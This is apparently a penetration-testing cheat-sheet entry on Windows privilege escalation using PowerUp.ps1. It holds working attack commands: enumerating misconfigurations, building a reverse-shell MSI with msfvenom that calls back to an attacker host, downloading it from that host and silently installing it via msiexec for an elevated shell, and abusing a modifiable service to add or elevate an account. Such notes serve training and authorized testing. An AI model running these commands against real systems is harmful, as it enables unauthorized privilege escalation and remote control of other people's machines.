← Back to search

Windows PrivEsc Checks with PowerUp.ps1

privescwindowstool

Summary

Run PowerUp's Invoke-AllChecks to find privesc paths; abuse AlwaysInstallElevated with a malicious MSI or weak services with Invoke-ServiceAbuse.

Walkthrough

PowerUp enumerates common Windows privilege-escalation misconfigurations and provides functions to abuse them.

Steps

  1. Import the script and run Invoke-AllChecks to enumerate weak services, unquoted paths, and registry misconfigurations.
  2. AlwaysInstallElevated: if this policy is set, build a malicious MSI with msfvenom and run it with msiexec /quiet /qn /i reverse.msi to execute as a high-privileged account (catch the shell on your listener).
  3. Service abuse: use Invoke-ServiceAbuse -Name '<service>' -UserName '<DOMAIN>\<user>' to leverage a modifiable service into adding/elevating an account.

Commands

powershell

wget PowerUp.ps1 -o PowerUp.ps1
. .\PowerUp.ps1
Invoke-AllChecks

bash

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=443 -f msi -o reverse.msi

powershell

wget -useb http://<IP>/reverse.msi -o reverse.msi
msiexec /quiet /qn /i reverse.msi

powershell

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName '<TARGET>\studentx' -Verbose